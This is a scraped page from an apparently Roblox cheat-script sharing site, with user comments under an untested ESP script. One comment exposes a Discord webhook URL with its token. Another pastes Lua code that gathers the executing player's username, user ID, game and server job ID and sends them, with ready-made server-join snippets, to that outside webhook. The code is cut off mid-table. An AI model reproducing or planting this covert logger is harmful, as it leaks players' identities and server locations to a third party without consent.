2.9k Views
Description
I don't know if it will work because I haven't tested it yet.
Comments
7

Offline
zxcv 11 months ago
test plz😢😢
Offline
COMBO_WOCK 11 months ago
@zxcv i remeber making script for this game. good ol days. @XXD14 you wanna make it together or you just posting esp and thats it?
Offline
Xcx_22 11 months ago
@COMBO_WOCK Umm ok
Offline
0aim_100aimbot 10 months ago
i like your webhook https://discord.com/api/webhooks/1396286672689430628/eLOatICOuvtqlMKWHm_8tYgpM4ia6FD2zBHl_ahWJYD4N4miTgaOX4bbviYG3lHPwQGy
Offline
Xcx_22 10 months ago
@0aim_100aimbot How would you do this to me?
Offline
pasterokya 2 months ago
local webhookURL = "https://discord.com/api/webhooks/1396286672689430628/eLOatICOuvtqlMKWHm_8tYgpM4ia6FD2zBHl_ahWJYD4N4miTgaOX4bbviYG3lHPwQGy"
local player = game.Players.LocalPlayer
local username = player.Name
local displayName = player.DisplayName
local userId = player.UserId
local gameName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name
local gameId = game.PlaceId
local jobId = game.JobId
local playerCount = #game.Players:GetPlayers()
local jsJoinCode = [[
fetch("https://games.roblox.com/v1/games/]] .. gameId .. [[/servers/Public?sortOrder=Asc&limit=100").then(res => res.json()).then(json => {
const server = json.data.find(s => s.id === "]] .. jobId .. [[");
if (server) {
window.open(`roblox://placeId=` + server.placeId + `&gameInstanceId=` + server.id);
} else {
console.log("Server not found.");
}
});
]]
local luaJoinScript = [[
local TeleportService = game:GetService("TeleportService")
TeleportService:TeleportToPlaceInstance(]] .. gameId .. [[, "]] .. jobId .. [[", game.Players.LocalPlayer)
]]
local embed = {
["*le"] = "Execution Log",
["description"] = "Here are the details of the player and game:",
["type"] = "rich",
["color"] = 0x000000,
["fields"] = {
{ ["name"] = "Username", ["value"] = username, ["inline"] = true },
{ ["name"] = "Display Name", ["value"] = displayName, ["inline"] = true },
{ ["name"] = "User ID", ["value"] = tostring(userId), ["inline"] = false },
{ ["name"] = "Game Name", ["value"] = gameName, ["inline"] = false },
{ ["name"] = "Game ID", ["value"] = tostring(gameId), ["inline"] = true },
{ ["name"] = "Players in Server", ["value"] = tostring(playerCount), ["inline"] = true },
![[🎉 RELEASE] Anime Astral Simulator](/images/script/113236157544232-1780333729144.png)
Voxle Hub
